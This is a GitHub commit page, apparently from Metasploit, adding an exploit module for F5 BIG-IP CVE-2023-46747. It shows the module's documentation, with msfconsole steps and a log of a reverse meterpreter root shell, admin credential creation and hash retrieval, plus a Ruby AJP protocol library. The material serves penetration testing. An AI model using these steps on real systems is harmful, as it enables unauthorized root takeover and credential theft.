-
Notifications
You must be signed in to change notification settings - Fork 13.7k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #18497, Add Exploit For F5 CVE-2023-46747
This module exploits a flaw in F5s BIG-IP Traffic Management User Interface (TMUI) that enables an external, unauthenticated attacker to create an administrative user. The attacker can then use the admin user to execute arbitrary code in the context of the root user.
- Loading branch information
Showing
5 changed files
with
501 additions
and
6 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
77 changes: 77 additions & 0 deletions
77
documentation/modules/exploit/linux/http/f5_bigip_tmui_rce_cve_2023_46747.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,77 @@ | ||
## Vulnerable Application | ||
|
||
### Description | ||
|
||
This module exploits a flaw in F5's BIG-IP Traffic Management User Interface (TMUI) that enables an external, | ||
unauthenticated attacker to create an administrative user. Once the user is created, the module uses the new account to | ||
execute a command payload. Both the exploit and check methods automatically delete any temporary accounts that are | ||
created. | ||
|
||
Tested against the VMware OVA release of 16.1.2.1-0.0.10 and 17.0.0.1-0.0.4. | ||
|
||
### Setup | ||
|
||
Download BIGIP-17.0.0.1-0.0.4.ALL-vmware.ova and import it into your desired virtualization software. | ||
|
||
The target does not need to be licensed to be vulnerable. | ||
|
||
## Verification Steps | ||
|
||
1. Install the application | ||
2. Start msfconsole | ||
3. Do: `use exploit/linux/http/f5_bigip_tmui_rce_cve_2023_46747` | ||
4. Set the `RHOST`, `PAYLOAD` and payload-related options | ||
5. Do: `run` | ||
6. You should get a shell. | ||
|
||
## Targets | ||
|
||
### Command | ||
|
||
This executes an OS command on the target device. | ||
|
||
## Options | ||
|
||
## Scenarios | ||
|
||
### F5 BIG-IP 17.0.0.1-0.0.4 | ||
|
||
``` | ||
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set RHOSTS 192.168.159.32 | ||
RHOSTS => 192.168.159.32 | ||
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp | ||
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp | ||
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set LHOST 192.168.159.128 | ||
LHOST => 192.168.159.128 | ||
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > check | ||
[+] 192.168.159.32:443 - The target is vulnerable. | ||
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > exploit | ||
[*] Started reverse TCP handler on 192.168.159.128:4444 | ||
[+] Admin user was created successfully. Credentials: UyPzjB - qu0k7MxIzIDlvS | ||
[+] Retrieved the admin hash: $6$gquMefr5$HGA8j7xLzHq2cfZOSudg6g6vETPpHthWOSWJtCtYd1sWRoNGCLnAQKbRvQoRm1QgEm8fC3HfH5tLI9KSSr8M10 | ||
[*] Obtained login token: 4TAZKYHLZCHPQX3FC47VWNSEUA | ||
[*] Sending stage (24768 bytes) to 192.168.159.32 | ||
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.32:35438) at 2023-11-01 16:36:04 -0400 | ||
meterpreter > getuid | ||
Server username: root | ||
meterpreter > sysinfo | ||
Computer : f5test2.home.lan | ||
OS : Linux 3.10.0-862.14.4.el7.ve.x86_64 #1 SMP Thu Jul 14 23:41:24 PDT 2022 | ||
Architecture : x64 | ||
Meterpreter : python/linux | ||
meterpreter > pwd | ||
/var/service/restjavad | ||
meterpreter > background | ||
[*] Backgrounding session 1... | ||
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > creds | ||
Credentials | ||
=========== | ||
host origin service public private realm private_type JtR Format cracked_password | ||
---- ------ ------- ------ ------- ----- ------------ ---------- ---------------- | ||
192.168.159.32 192.168.159.32 443/tcp (F5 BIG-IP TMUI) admin $6$gquMefr5$HGA8j7xLzHq2cfZOSudg6g6vETPpHthWOSWJtCtYd1sWRoNGCLnAQKbRvQoRm1QgEm8fC3HfH5t (TRUNCATED) Nonreplayable hash sha512,crypt | ||
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,127 @@ | ||
# -*- coding: binary -*- | ||
|
||
require 'bindata' | ||
|
||
# @see: https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html | ||
module Rex::Proto::ApacheJP | ||
class ApacheJPBoolean < BinData::Primitive | ||
endian :big | ||
|
||
uint8 :data | ||
|
||
def get | ||
self.data != 0 | ||
end | ||
|
||
def set(v) | ||
self.data = v ? 1 : 0 | ||
end | ||
end | ||
|
||
class ApacheJPString < BinData::Primitive | ||
endian :big | ||
|
||
uint16 :len, value: -> { data.length } | ||
stringz :data | ||
|
||
def get | ||
self.data | ||
end | ||
|
||
def set(v) | ||
self.data = v | ||
end | ||
end | ||
|
||
class ApacheJPReqHeaderName < BinData::Primitive | ||
COMMON_HEADERS = %w{ accept accept-charset accept-encoding accept-language authorization connection content-type content-length cookie cookie2 host pragma referer user-agent } | ||
endian :big | ||
|
||
uint16 :len_or_code | ||
stringz :data, onlyif: -> { len_or_code < 0xa000 } | ||
|
||
def get | ||
if len_or_code >= 0xa000 | ||
COMMON_HEADERS[(len_or_code.to_i & 0xff) - 1] | ||
else | ||
self.data | ||
end | ||
end | ||
|
||
def set(v) | ||
if (idx = COMMON_HEADERS.index(v)) | ||
self.len_or_code = 0xa000 | (idx + 1) | ||
else | ||
raise RuntimeError if v.length >= 0xa000 | ||
|
||
self.len_or_code = v.length | ||
self.data = v | ||
end | ||
end | ||
end | ||
|
||
class ApacheJPRequestHeader < BinData::Record | ||
endian :big | ||
|
||
apache_jp_req_header_name :header_name | ||
apache_jp_string :header_value | ||
end | ||
|
||
class ApacheJPRequestAttribute < BinData::Record | ||
CODE_CONTEXT = 1 | ||
CODE_SERVLET_PATH = 2 | ||
CODE_REMOTE_USER = 3 | ||
CODE_AUTH_TYPE = 4 | ||
CODE_QUERY_STRING = 5 | ||
CODE_JVM_ROUTE = 6 | ||
CODE_SSL_CERT = 7 | ||
CODE_SSL_CIPHER = 8 | ||
CODE_SSL_SESSION = 9 | ||
CODE_REQ_ATTRIBUTE = 10 | ||
CODE_TERMINATOR = 0xff | ||
|
||
endian :big | ||
|
||
uint8 :code | ||
apache_jp_string :attribute_value, onlyif: -> { code != CODE_TERMINATOR } | ||
end | ||
|
||
class ApacheJPForwardRequest < BinData::Record | ||
HTTP_METHOD_OPTIONS = 1 | ||
HTTP_METHOD_GET = 2 | ||
HTTP_METHOD_HEAD = 3 | ||
HTTP_METHOD_POST = 4 | ||
HTTP_METHOD_PUT = 5 | ||
HTTP_METHOD_DELETE = 6 | ||
HTTP_METHOD_TRACE = 7 | ||
HTTP_METHOD_PROPFIND = 8 | ||
HTTP_METHOD_PROPPATCH = 9 | ||
HTTP_METHOD_MKCOL = 10 | ||
HTTP_METHOD_COPY = 11 | ||
HTTP_METHOD_MOVE = 12 | ||
HTTP_METHOD_LOCK = 13 | ||
HTTP_METHOD_UNLOCK = 14 | ||
HTTP_METHOD_ACL = 15 | ||
HTTP_METHOD_REPORT = 16 | ||
HTTP_METHOD_VERSION_CONTROL = 17 | ||
HTTP_METHOD_CHECKIN = 18 | ||
HTTP_METHOD_CHECKOUT = 19 | ||
HTTP_METHOD_UNCHECKOUT = 20 | ||
HTTP_METHOD_SEARCH = 21 | ||
|
||
endian :big | ||
|
||
uint8 :prefix_code, value: 2 | ||
uint8 :http_method | ||
apache_jp_string :protocol, initial_value: 'HTTP/1.1' | ||
apache_jp_string :req_uri | ||
apache_jp_string :remote_addr | ||
apache_jp_string :remote_host | ||
apache_jp_string :server_name | ||
uint16 :server_port, initial_value: -> { is_ssl ? 80 : 443 } | ||
apache_jp_boolean :is_ssl, initial_value: false | ||
uint16 :num_headers, initial_value: -> { headers.length } | ||
array :headers, type: :apache_jp_request_header, initial_length: :num_headers | ||
array :attributes, type: :apache_jp_request_attribute, read_until: -> { element.code == ApacheJPRequestAttribute::TERMINATOR } | ||
end | ||
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Oops, something went wrong.